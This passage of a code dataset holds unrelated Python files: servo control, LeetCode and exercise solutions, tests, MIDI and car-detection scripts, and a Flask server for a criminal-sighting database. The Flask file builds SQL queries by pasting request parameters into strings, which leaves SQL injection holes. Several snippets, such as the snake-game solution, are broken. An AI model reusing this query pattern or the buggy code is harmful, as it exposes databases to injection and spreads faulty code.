suffix = 'preview'\n\n if suffix != 'release':\n version = make_prerelease_version(version, suffix, COOKIE_FILE)\n print('updated', COOKIE_FILE)\n\n template = NUPKG_ID + '.nuspec'\n nuspec = NUPKG_ID + '.' + version + '.nuspec'\n nupkg = NUPKG_ID + '.' + version + '.nupkg'\n\n tempdir = os.path.join(TEMPDIR, version)\n items = [Item(input, CACHEDIR, tempdir) for input in INPUTS]\n\n create_nuspec(template, nuspec, version, items)\n print('created', nuspec)\n\n create_makefile('Makefile', nupkg, nuspec, items)\n print('created', 'Makefile', 'to make', nupkg)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"packaging/dotnet-core/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"591810809","text":"\n# Control servo motor\n# SImply run servo motor for \"jigging_time\"\n# Then pause servo motor for \"stopped_percent\"\n\nimport time\nimport wiringpi\n\nclass Servo:\n def __init__(self, brainz=None, verbose=False):\n self.verbose = verbose\n self.brainz = brainz\n self.started = False\n self.cycle_time = 0\n self.cycle_to = brainz.jigging_time * (100 - brainz.stopped_percent) / 100\n self.stopped = False\n\n def __print(self, str):\n if self.verbose:\n print (str)\n\n def start(self):\n self.started = True\n # use 'GPIO naming'\n wiringpi.wiringPiSetupGpio()\n # set #18 to be a PWM output\n wiringpi.pinMode(18, wiringpi.GPIO.PWM_OUTPUT)\n # set the PWM mode to milliseconds stype\n wiringpi.pwmSetMode(wiringpi.GPIO.PWM_MODE_MS)\n # divide down clock\n wiringpi.pwmSetClock(192)\n wiringpi.pwmSetRange(2000)\n\n def stop(self):\n self.started = False\n\n def tick(self,interval):\n self.__print(\"Hei\")\n self.__print(self.started)\n if not self.started:\n return\n if self.stopped:\n self.__print(\"Stopped\")\n wiringpi.pwmWrite(18, 169)\n else:\n self.__print(\"Move\")\n wiringpi.pwmWrite(18, 175)\n\n self.cycle_time += interval\n\n if self.cycle_time >= self.cycle_to:\n self.cycle_time = 0\n self.stopped = not self.stopped\n if self.stopped:\n self.cycle_to = self.brainz.jigging_time * self.brainz.stopped_percent / 100\n else:\n self.cycle_to = self.brainz.jigging_time * (100 - self.brainz.stopped_percent) / 100\n","sub_path":"servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"462239290","text":"from collections import Counter\nfrom operator import itemgetter\nclass Solution(object):\n def frequencySort(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n counter = Counter(s)\n\n sorted_chrs = sorted(counter.items(), key=itemgetter(1), reverse=True)\n\n sorted_by_freq = list(map(itemgetter(0), sorted_chrs))\n result = []\n for c in sorted_by_freq:\n result.extend([c] * counter[c])\n\n return ''.join(result)\n\nstr1 = 'tree'\nresult = Solution().frequencySort(str1)\nprint(result)\n\n","sub_path":"sort-characters-by-frequency/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"133914152","text":"import random\n\n# 미션1: 키를 이용한 정렬 예제\nclass Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __repr__(self):\n return repr('<이름: %s, 나이: %d>' % (self.name, self.age))\n\naddressBook = [\n Person('최자영', 38),\n Person('김철수', 35),\n Person('홍길동', 20)\n]\n\naddressBook.sort(key=lambda address: address.age)\nprint(addressBook)\n\n# 미션2: 피보나치 이터레이터\nclass FibIterator:\n def __init__(self, a=1, b=0, maxValue=50):\n self.a = a\n self.b = b\n self.maxValue = maxValue\n\n def __iter__(self):\n return self\n\n def __next__(self):\n n = self.a + self.b\n if n > self.maxValue:\n raise StopIteration()\n self.a = self.b\n self.b = n\n return n\n\nfor i in FibIterator():\n print(i, end=\" \")\nprint()\n\n# 미션3: 동전 던기지 게임\narr = [\"head\", \"tail\"]\n\nwhile True:\n answer = input(\"동전 던지기를 계속하시겠습니까?(yes, no) \")\n if answer == 'no' or (not answer == 'no' and not answer == 'yes'):\n break\n print(random.choice(arr))","sub_path":"2018037010_11.py","file_name":"2018037010_11.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"381574348","text":"# -*- coding: utf-8 -*-\nfrom nose.tools import assert_equal\nfrom nose_config import set_rest, load_from_json, json_is_valid\n\n\n# ---------------------TESTS---------------------#\ndef test_programs_get_rest():\n r = rest.program.get_list()\n assert_equal(r[0], 200, 'CODE 200')\n schema = load_from_json(\"data/json_schemas/programs.json\")\n v = json_is_valid(r[1], schema)\n assert_equal(v[0], True, v[1])\n\n\ndef test_programs_get_current_next():\n r = rest.program.get_current_next()\n assert_equal(r[0], 200, 'CODE 200')\n schema = load_from_json(\"data/json_schemas/programs_current_next.json\")\n v = json_is_valid(r[1], schema)\n assert_equal(v[0], True, v[1])\n\n\ndef test_programs_get_on_demand():\n r = rest.program.get_on_demand_next()\n assert_equal(r[0], 200, 'CODE 200')\n schema = load_from_json(\"data/json_schemas/programs_on_demand.json\")\n v = json_is_valid(r[1], schema)\n assert_equal(v[0], True, v[1])\n\n\ndef setup_module():\n global rest\n rest = set_rest()\n\n","sub_path":"tests/test_programs_rest.py","file_name":"test_programs_rest.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"158837875","text":"'''\nCreated on Aug 2, 2014\nmodified from the single-note-example form midiutil\n@author: darius\n'''\n############################################################################\n# A sample program to create a multi-track MIDI file, add notes,\n# and write to disk.\n############################################################################\n\n#Import the library\nfrom MidiFile3 import MIDIFile\nimport testgui\n\n# Create the MIDIFile Object\nMyMIDI = MIDIFile(2) ### the integer = the number of parallel tracks available\n\n# Add track names and tempo. The first argument to addTrackName and\n# addTempo is the time to write the event. This initialises the tracks.\ntracks = (0, 1)\nstart_time = 0\n\nMyMIDI.addTrackName(tracks[0],start_time,\"Piano\")\nMyMIDI.addTempo(tracks[0],start_time, 120)\n#MyMIDI.addTrackName(tracks[1],start_time,\"Cello\")\n#MyMIDI.addTempo(tracks[1],start_time, 120)\n\n# Each track can hold multiple channels, we'll use two for now\nchannels = (0,1)\n\n# Add a note. addNote expects the following information:\n#channel = some integer >= 0\n#pitch = some integer >= 0 ... middle C = 60\n#duration = 1 corresponds to a crotchet, aka a quarter note\n#volume = 100\nvolume = Window.volume_data # may as well specify this here for now\n\n# Now add the note.\n# MyMIDI.addNote(track,channel,pitch,note_start_time,duration,volume)\nclass compose:\n def __init__(self):\n self.treble_loc = start_time\n self.bass_loc = start_time\n# self.octave = dict([('C',60),('D',62),('E',64),('F',65),\n# ('G',67),('A',69),('B',71),\n# ('C#',61),('D#',63),('F#',66),('G#',68),('A#',70),\n# ('Db',61),('Eb',63),('Gb',66),('Ab',68),('Bb',70)])\n\n def add2treble(self, pitch, length):\n MyMIDI.addNote(tracks[0],channels[0],pitch,self.treble_loc,length,volume)\n self.treble_loc += length # moving to next time to start a note\n def add2bass(self, pitch, length):\n MyMIDI.addNote(tracks[0],channels[1],pitch,self.bass_loc,length,volume)\n self.bass_loc += length # moving to next time to start a note\n\ncomposition = compose()\ncomposition.add2treble(64, 1)\ncomposition.add2treble(62, 1)\ncomposition.add2treble(60, 2)\ncomposition.add2bass(48, 1)\ncomposition.add2bass(55, 1)\ncomposition.add2bass(48, 2)\n\nprint(str(volume))\n\n# And write it to disk.\nbinfile = open(\"output.mid\", 'wb')\nMyMIDI.writeFile(binfile)\nbinfile.close()\n\n","sub_path":"classical_optimism.py","file_name":"classical_optimism.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"638157553","text":"#!/Library/Frameworks/Python.framework/Versions/3.5/bin/python3\n\n# create a 300x300 canvas.\n# create a square drawing function that takes 1 parameter:\n# the square size\n# and draws a square of that size to the center of the canvas.\n# draw 3 squares with that function.\n\nfrom tkinter import *\nroot = Tk()\n\nsize = 300\ncanvas = Canvas(root, width=size, height=size)\ncanvas.pack()\n\n\ndef square_drawing(x):\n canvas.create_rectangle(size/2 - x/2, size/2 - x/2, size/2 + x/2, size/2 + x/2, fill=\"green\")\n print (size/2-x)\n print (size/2)\n\n\nsquare_drawing(120)\nsquare_drawing(50)\nsquare_drawing(20)\n\n\nroot.mainloop()\n","sub_path":"week-04/day-3/09.py","file_name":"09.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"17319982","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 14 18:53:35 2017\r\n\r\n@author: Anton Varfolomeev\r\n\"\"\"\r\n\r\nimport matplotlib.image as mpimg\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pickle\r\nimport time\r\nimport cv2\r\nfrom scipy.ndimage.measurements import label\r\n\r\n\r\n# Set up SVM from OpenCV 3\r\ndef cv_svm (X_train, X_test, y_train, y_test):\r\n C=0.8\r\n kernel = 'rbf'\r\n gamma = 6.5e-4\r\n\r\n t=time.time()\r\n \r\n svm = cv2.ml.SVM_create()\r\n # Set SVM type\r\n svm.setType(cv2.ml.SVM_C_SVC)\r\n # Set SVM Kernel to Radial Basis Function (RBF) \r\n svm.setKernel(cv2.ml.SVM_RBF)\r\n # Set parameter C\r\n svm.setC(C)\r\n # Set parameter Gamma\r\n svm.setGamma(gamma)\r\n \r\n # Train SVM on training data \r\n svm.train(X_train, cv2.ml.ROW_SAMPLE, y_train)\r\n\r\n t2 = time.time()\r\n \r\n # Save trained model \r\n svm.save(\"./models/u_svm_model.yml\");\r\n \r\n # Test on a held out test set\r\n testResponse = svm.predict(X_test)[1].ravel()\r\n accuracy = 1-sum(np.abs(testResponse-y_test))/y_test.size\r\n\r\n\r\n print(round(t2-t, 2), 'Seconds to train cv2.SVM...')\r\n # Check the score of the SVC\r\n print('Test Accuracy of cv2.SVM = ', round(accuracy, 4))\r\n return svm\r\n \r\ndef score (svm, X_test, y_test):\r\n testResponse = svm.predict(X_test)[1].ravel()\r\n accuracy = 1-sum(np.abs(testResponse-y_test))/y_test.size\r\n return accuracy\r\n\r\n#%%\r\n# Define a single function that can extract features using hog sub-sampling and make predictions\r\ndef find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, \r\n cell_per_block, spatial_size, cells_per_step):\r\n global hot_features\r\n global patches\r\n \r\n \r\n img_tosearch = img[ystart:ystop,:,:]\r\n ctrans_tosearch = cv2.cvtColor(img_tosearch, cv2.COLOR_RGB2HLS)\r\n if scale != 1:\r\n imshape = ctrans_tosearch.shape\r\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\r\n \r\n ch1 = ctrans_tosearch[:,:,0]\r\n ch2 = ctrans_tosearch[:,:,1]\r\n ch3 = ctrans_tosearch[:,:,2]\r\n\r\n # Define blocks and steps as above\r\n nxblocks = (ch1.shape[1] // pix_per_cell) - cell_per_block + 1\r\n nyblocks = (ch1.shape[0] // pix_per_cell) - cell_per_block + 1 \r\n nfeat_per_block = orient*cell_per_block**2\r\n \r\n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\r\n window = spatial_size\r\n win_draw = np.int(window*scale)\r\n\r\n nblocks_per_window = (window // pix_per_cell) - cell_per_block + 1\r\n #cells_per_step = 2 # Instead of overlap, define how many cells to step\r\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step + 1\r\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step + 1\r\n \r\n # size of one hog vector\r\n hogSize = nblocks_per_window * nblocks_per_window * cell_per_block * cell_per_block * orient\r\n\r\n #define shape for target matrices\r\n hogShape = (nysteps, nxsteps, hogSize)\r\n # Compute individual channel HOG features for the entire image\r\n #done hog_cv.compute (ch1, (16,16))\r\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, window, cells_per_step).reshape(hogShape)\r\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, window, cells_per_step).reshape(hogShape)\r\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, window, cells_per_step).reshape(hogShape)\r\n \r\n #patches = np.zeros((nysteps, nxsteps, window, window,3),np.uint8)\r\n boxes = np.zeros((nxsteps*nysteps,2,2), 
np.int32)\r\n bboxes = []\r\n features = np.zeros((nxsteps*nysteps, hogSize*3), np.float32)\r\n #todo: loop\r\n for yb in range(nysteps):\r\n for xb in range(nxsteps):\r\n # Extract HOG for this patch\r\n \r\n ypos = yb*cells_per_step\r\n xpos = xb*cells_per_step\r\n\r\n xleft = xpos*pix_per_cell\r\n ytop = ypos*pix_per_cell\r\n \r\n \r\n # Extract HOG for this patch\r\n hog_feat1 = hog1[yb, xb]\r\n hog_feat2 = hog2[yb, xb]\r\n hog_feat3 = hog3[yb, xb]\r\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\r\n\r\n # Extract the image patch\r\n #subimg = ctrans_tosearch[ytop:ytop+window, xleft:xleft+window]\r\n #patches[yb,xb] = subimg\r\n \r\n # Get color features\r\n #spatial_features = bin_spatial(subimg, size=spatial_size)\r\n #hist_features = color_hist(subimg, nbins=hist_bins)\r\n\r\n # Scale features and make a prediction\r\n features[yb*nxsteps + xb] = (X_scaler.transform(hog_features.reshape(1,-1)))\r\n boxes[yb*nxsteps + xb] = ((xleft*scale, ytop*scale + ystart), \r\n ((xleft+window)*scale, (ytop+window)*scale+ystart))\r\n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \r\n \r\n prediction = svc.predict(features)[1].ravel() # use the classifier passed in as svc\r\n \r\n for i in range(len(prediction)):\r\n if (prediction[i] == 1):\r\n bboxes.append( boxes[i] )\r\n \r\n return bboxes\r\n \r\n#%%\r\ndef draw_bboxes(img, bboxes):\r\n draw_img = np.copy(img)\r\n\r\n color = (0,0,255)\r\n thickness = 6\r\n\r\n\r\n for box in bboxes:\r\n #print (\"detected at\", xb,yb, xbox_left, ytop_draw)\r\n cv2.rectangle(draw_img, tuple(box[0]), tuple(box[1]), color, thickness) \r\n return draw_img \r\n\r\n#%%\r\n\r\ndef boxes_multy_scale(img):\r\n global scales\r\n global window\r\n top = 400\r\n cell = 8 #cell size in pixels\r\n shift = 2 #shift in cells\r\n boxes = []\r\n for scale in scales:\r\n #bottom = top + np.int(window * scale) + 1\r\n bottom = top + np.int(window * scale + cell * shift * scale) + 1\r\n boxes.extend(find_cars(img, top, bottom, scale, mySvm, X_scaler, 11, \r\n cell, 2, window, shift))\r\n return boxes\r\n \r\ndef add_heat(heatmap, bbox_list, tau=0.9):\r\n # Iterate through list of bboxes\r\n heatmap = heatmap * tau\r\n for box in bbox_list:\r\n # Add += 1 for all pixels inside each bbox\r\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\r\n width = box[1][1]-box[0][1]\r\n height = box[1][0]-box[0][0]\r\n bx = np.ones(( width, height), np.float32) #/2\r\n #bx2 = np.ones((width//2, height//2), np.float32)/2\r\n #bx[width//4:(width + width//2)//2, height//4:(height+height//2)//2] += bx2 \r\n heatmap[box[0][1]:box[1][1], box[0][0]:box[1][0]] += bx\r\n\r\n # Return updated heatmap\r\n return heatmap\r\n \r\ndef draw_labeled_bboxes(img, labels):\r\n # Iterate through all detected cars\r\n for car_number in range(1, labels[1]+1):\r\n # Find pixels with each car_number label value\r\n nonzero = (labels[0] == car_number).nonzero()\r\n # Identify x and y values of those pixels\r\n nonzeroy = np.array(nonzero[0])\r\n nonzerox = np.array(nonzero[1])\r\n # Define a bounding box based on min/max x and y\r\n x0 = np.min(nonzerox)\r\n x1 = np.max(nonzerox)\r\n y0 = np.min(nonzeroy)\r\n y1 = np.max(nonzeroy)\r\n w = x1 - x0\r\n h = y1 - y0\r\n if (w > window * 2 and h > window * 2):\r\n bbox = ((x0, y0), (x1, y1))\r\n # Draw the box on the image\r\n cv2.rectangle(img, bbox[0], bbox[1], (0,100,0), 3)\r\n # Return the image\r\n return img\r\n \r\n#%%\r\n\r\n\r\n\r\n#main processing pipeline\r\ndef process_image(image):\r\n global heat\r\n\r\n\r\n boxes = boxes_multy_scale(image)\r\n heat = add_heat(heat,boxes,tau)\r\n \r\n heat_thr = heat.copy()\r\n heat_thr[heat_thr < thr] = 0\r\n\r\n labels = label(heat_thr)\r\n draw_img = draw_labeled_bboxes(np.copy(image), labels)\r\n\r\n return draw_img\r\n \r\n\r\n#%%\r\n\r\n","sub_path":"process_image.py","file_name":"process_image.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"636006121","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.posts_list, name='posts_list'),\n path('post/', views.post_detail, name='post_detail'),\n path('post/new', views.post_new, name='post_new'),\n path('post//edit/', views.post_edit, name='post_edit'),\n path('post//answer/', views.add_answer, name=\"add_answer\")\n\n]\n","sub_path":"Homepage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"434415344","text":"import re\nimport os\nimport pickle as pk\n\nhant_pattern = re.compile(r'public static \\$zh2Hant = \\[([^]]*)]', re.M)\npair_pattern = re.compile(r'\\'([^\\']+)\\' => \\'([^\\']+)\\'')\nhans_pattern = re.compile(r'public static \\$zh2Hans = \\[([^]]*)]', re.M)\npardir = os.path.abspath(__file__)\npardir = os.path.dirname(pardir)\n\ndef make_dict(data, pattern, file_path):\n with open(file_path, 'w', encoding='UTF-8') as fout:\n for p in pattern.findall(data):\n for pp in pair_pattern.findall(p):\n fout.write('%s\\t%s\\n' % pp)\n\ndef load_dict(file_path):\n conv = dict()\n conv['dict'] = dict()\n with open(file_path, 'r', encoding='UTF-8') as fin:\n for line in fin:\n line = line.strip().split('\\t')\n n = len(line[0])\n dd = conv['dict'].get(n, dict())\n dd[line[0]] = line[1]\n conv['dict'][n] = dd\n conv['length'] = sorted(list(conv['dict'].keys()), reverse=True)\n return conv\n\ndef abspath(path):\n global pardir\n return os.path.join(pardir, path)\n\ndef conv():\n with open(abspath('ZhConversion.php'), 'r', encoding='UTF-8') as fin:\n data = fin.read()\n make_dict(data, hant_pattern, abspath('zhhans2t.txt'))\n make_dict(data, hans_pattern, abspath('zhhant2s.txt'))\n\n zhhanz = dict()\n zhhanz['s2t'] = load_dict(abspath('zhhans2t.txt'))\n zhhanz['t2s'] = load_dict(abspath('zhhant2s.txt'))\n with open(abspath('zhhanz.pkl'), 'wb') as pkl:\n pk.dump(zhhanz, pkl)\n\n os.remove(abspath('zhhans2t.txt'))\n os.remove(abspath('zhhant2s.txt'))\n\nif __name__ == '__main__':\n conv()\n","sub_path":"php_conv.py","file_name":"php_conv.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"571864780","text":"class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n r, c, l = len(s1), len(s2), len(s3)\n\n if r + c != l:\n return False\n\n queue, visited = [(0, 0)], set((0, 0))\n\n while queue:\n x, y = queue.pop(0)\n\n if x + y == l:\n return True\n\n if x + 1 <= r and s1[x] == s3[x + y] and (x + 1, y) not in visited:\n queue.append((x + 1, y))\n visited.add((x + 1, y))\n\n if y + 1 <= c and s2[y] == s3[x + y] and (x, y + 1) not in visited:\n queue.append((x, y + 1))\n visited.add((x, y + 1))\n\n return False\n","sub_path":"Leetcode/97. Interleaving String.py","file_name":"97. Interleaving String.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"226847542","text":"from flask import Flask, jsonify, flash, redirect, render_template, request, session, abort\nimport os\nimport pymysql as MySQLdb\nimport json\nfrom datetime import datetime\nfrom waitress import serve\n\nimport pandas as pd\nimport numpy as np\nimport webbrowser\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('criminal_list.html')\n\n@app.route('/crimdetails')\ndef crimdetails(): \n #post = request.form.to_dict()\n #crimid = str(post['crimid'])\n crimid=request.args.get('cid') \n session['crimid']=crimid\n #webbrowser.open_new_tab('/templates/CriminalDetails.html') \n to_send={'status': '0', 'error': 'null'}\n return render_template('CriminalDetailsUI1.html')\n\n@app.route('/crimdetailsfromlist', methods=[\"POST\", \"GET\"])\ndef crimdetailsfromlist(): \n post = request.get_json()\n crimid = str(post.get('crimid')) \n session['crimid']=crimid\n #webbrowser.open_new_tab('/templates/CriminalDetails.html') \n to_send={'status': '0', 'error': 'null'}\n webbrowser.open_new_tab('http://127.0.0.1:5000/crimdetails?cid='+crimid)\n return to_send\n\n@app.route('/getCriminalsList', methods=[\"POST\", \"GET\"])\ndef getCriminalsList():\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n cursor.execute(\"select `cam_id`,`criminal_id`,`date`,`time` from criminal_list order by date desc\")\n data = cursor.fetchall()\n to_send = []\n for row in data:\n camid=row[0]\n crimid=row[1]\n cursor.execute(\"select `place` from cam_details where cam_id=%d\"%(camid))\n camdata=cursor.fetchall()\n cursor.execute(\"select `cname` from criminals where cid='%s'\"%(crimid))\n crimdata=cursor.fetchall()\n date=row[-2]\n time=row[-1]\n s=time.seconds\n hours, remainder = divmod(s, 3600)\n minutes, seconds = divmod(remainder, 60)\n t='{:02}:{:02}:{:02}'.format(int(hours), int(minutes), int(seconds))\n date = date.strftime('20%y-%m-%d')\n to_send.append({'name':crimdata[0][0],'place':camdata[0][0],'date':date,'time':t,'cid':crimid}) \n return jsonify(result=to_send)\n\n@app.route('/getText', methods=[\"POST\", \"GET\"])\ndef getText():\n post = request.form.to_dict()\n to_send = {'status': '0', 'error': 'null'}\n letter = str(post['letter'])\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n cursor.execute(\"update crimLetter set `name`= '%s'\"%(letter))\n to_send[\"status\"] = \"1\"\n to_send[\"error\"] = \"Password Changed Successfully!\"\n return to_send\n\n@app.route('/getCriminalsDetails', methods=[\"POST\", \"GET\"])\ndef getCriminalsDetails():\n crimid=session['crimid']\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n cursor.execute(\"select `cname`,`caddress`,`cage`,`cphone` from criminals where cid='%s'\"%(crimid))\n data = cursor.fetchall()\n to_send = []\n for row in data:\n to_send.append({'cid':crimid,'cname':row[0],'caddress':row[1],'cage':row[2],'cphone':row[3]})\n cdet=[]\n cursor.execute(\"select `crime`,`place`,`date`,`time` from crime_history where cid='%s' order by date desc\"%(crimid))\n data = cursor.fetchall()\n for row in data:\n date = row[2]\n time=row[-1]\n s=time.seconds\n hours, remainder = divmod(s, 3600)\n minutes, seconds = divmod(remainder, 60)\n t='{:02}:{:02}:{:02}'.format(int(hours), int(minutes), int(seconds))\n date = date.strftime('20%y-%m-%d')\n cdet.append({'crime': row[0], 'place': row[1], 'date': date, 'time': t}) \n to_send[0]['cdetails']=cdet \n cursor.execute(\"select cam_id from 
criminal_list where criminal_id='%s' order by date desc,time desc\"%(crimid))\n data=cursor.fetchall()\n loc=[]\n for i in data:\n camid=i[0]\n cursor.execute(\"select place,latitude,longitude from cam_details where cam_id=%d\"%(camid))\n loc_data=cursor.fetchall()[0]\n loc.append({'place':loc_data[0],'latitude':loc_data[1],'longitude':loc_data[2]})\n to_send[0]['locations']=loc \n return jsonify(result=to_send)\n\n@app.route('/insertCrimList', methods=[\"POST\", \"GET\"])\ndef insertCrimList():\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n post = request.form.to_dict()\n crimid = str(post['crimid'])\n camid = str(post['cam_id'])\n stime = str(post['time'])\n sdate = str(post['date'])\n print(crimid,camid,stime,sdate)\n cursor.execute(\"insert into criminal_list (`date`, `time`, `cam_id`, `criminal_id`) values('%s','%s','%s','%s')\"%(sdate,stime,camid,crimid))\n #webbrowser.open_new_tab('http://127.0.0.1:5000/crimdetails?cid='+crimid)\n to_send = {'status': '1'}\n return jsonify(result=to_send)\n\nif __name__ == \"__main__\":\n app.secret_key = os.urandom(12)\n #serve(app, host='0.0.0.0', port=8080)\n app.run(threaded=True,debug=True)\n","sub_path":"WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"448688763","text":"from collections import deque\nN=int(input())\nmaps=[[0]*N for _ in range(N)]\n\n# 사과가 있는 곳 1로 변경\nfor y,x in list(map(int, input().split())): maps[y-1][x-1]=1\n\n# 머리가 동,서,남,북 방향에 있을 때 전진하는 좌표와 D, L 방향의 y,x 이동 좌표\ndir={1:[(0,1),(-1,0),(1,0)], 2:[(0,-1),(-1,0),(1,0)], 3:[(1,0), (0,-1),(0,1)], 4:[(-1,0),(0,1),(0,-1)]} \nrotate=deque()\nfor t, d in range(int(input())):\n if d=='D': # 오른쪽으로 90도 회전\n rotate.append((t, 1))\n elif d=='L': # 왼쪽으로 90도 회전\n rotate.append((t, 2))\n\nhead=1 # 초기 뱀의 머리,꼬리는 오른쪽(동쪽) 방향에 있음\nmaps[0][0]=2; # 뱀이 있는 곳 2로 변경\ncury=0; curx=0\ntaily=0; tailx=0\nnexttaily=0; nexttailx=0\ntic=0\n\nwhile True:\n if rotate and tic==rotate[0][0]: \n nextd=rotate[0][1]; rotate.popleft()\n else: nextd=0\n nexty, nextx=cury+dir[head][nextd][0], curx+dir[head][nextd][1]\n \n if nexty==0 or nexty==N-1 or nextx==0 or nextx==N-1 or maps[nexty][nextx]==2:\n break\n \n if maps[nexty][nextx]==1:\n maps[nexty][nextx]=2\n else:\n maps[taily][tailx]=0\n \n tic+=1\n cury, curx=nexty, nextx\n\n \n\n","sub_path":"Algorithm/BOJ_3190_뱀.py","file_name":"BOJ_3190_뱀.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"386349827","text":"import re\nfrom pyspark import SparkConf, SparkContext\n\ndef normalizeWords(text):\n    return re.compile(r'\\w+',re.UNICODE).split(text.lower())\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"wordCounts\")\n\nsc = SparkContext(conf = conf)\n\ninput = sc.textFile(\"book.txt\")\nwords = input.flatMap(normalizeWords)\nwordCount = words.map(lambda x:(x,1)).reduceByKey(lambda x, y : x+y)\nwordCountSorted= wordCount.map(lambda x:(x[1],x[0])).sortByKey()\nresults = wordCountSorted.collect()\n\nfor result in results:\n    count = str(result[0])\n    word = result[1].encode('ascii', 'ignore')\n\n    if(word):\n        print(word.decode() + \":\\t\\t\" +count)\n","sub_path":"sorted_word_count.py","file_name":"sorted_word_count.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"408189374","text":"import unittest\nimport numpy as np\nimport pandas as pd\nfrom training.training import model_training\n\n\n# create dataframe for testing the preprocessing functions:\ndef mock_data(number_of_samples):\n integer_array = np.random.randint(2, size=(number_of_samples, 2))\n for categories_numbers in range(5, 50, 10):\n integer_array = np.append(\n integer_array, np.random.randint(categories_numbers, size=(number_of_samples, 2)), axis=1\n )\n integer_columns = [f\"int_col_{x}\" for x in range(integer_array.shape[1])]\n\n continuous_array = np.random.randn(number_of_samples, 10)\n continuous_columns = [f\"cont_col_{x}\" for x in range(continuous_array.shape[1])]\n\n integer_dataframe = pd.DataFrame(integer_array, columns=integer_columns)\n continuous_dataframe = pd.DataFrame(continuous_array, columns=continuous_columns)\n\n dataframe = pd.concat([integer_dataframe, continuous_dataframe], axis=1)\n target = (np.sum(continuous_array, axis=1) - 1) / (1 + np.sum(integer_array, axis=1))\n return dataframe, target\n\n\ntrain_dataframe, train_target = mock_data(1000)\nvalid_dataframe, valid_target = mock_data(100)\ntest_dataframe, test_target = mock_data(100)\n\nparameters_linear = {\n \"data\": {\n \"train\": {\"features\": train_dataframe, \"target\": train_target},\n \"valid\": {\"features\": valid_dataframe, \"target\": valid_target},\n \"test\": {\"features\": test_dataframe, \"target\": test_target},\n },\n \"split\": {\n \"method\": \"split\", # \"method\":\"kfold\"\n \"split_ratios\": 0.2, # foldnr:5 , \"split_ratios\": 0.8 # \"split_ratios\":(0.7,0.2)\n },\n \"model\": {\"type\": \"Ridge linear regression\",\n \"hyperparameters\": {\"alpha\": 1, # alpha:optimize\n },\n },\n \"metrics\": [\"r2_score\", \"mean_squared_error\"],\n \"predict\": {\n \"test\": {\"features\": test_dataframe}\n }\n}\n\nparameters_lightgbm = {\n \"data\": {\n \"train\": {\"features\": train_dataframe, \"target\": train_target},\n \"valid\": {\"features\": valid_dataframe, \"target\": valid_target},\n \"test\": {\"features\": test_dataframe, \"target\": test_target},\n },\n \"split\": {\n \"method\": \"split\", # \"method\":\"kfold\"\n \"split_ratios\": 0.2, # foldnr:5 , \"split_ratios\": 0.8 # \"split_ratios\":(0.7,0.2)\n },\n \"model\": {\"type\": \"lightgbm\",\n \"hyperparameters\": dict(objective='regression', metric='root_mean_squared_error', num_leaves=5,\n boost_from_average=True,\n learning_rate=0.05, bagging_fraction=0.99, feature_fraction=0.99, 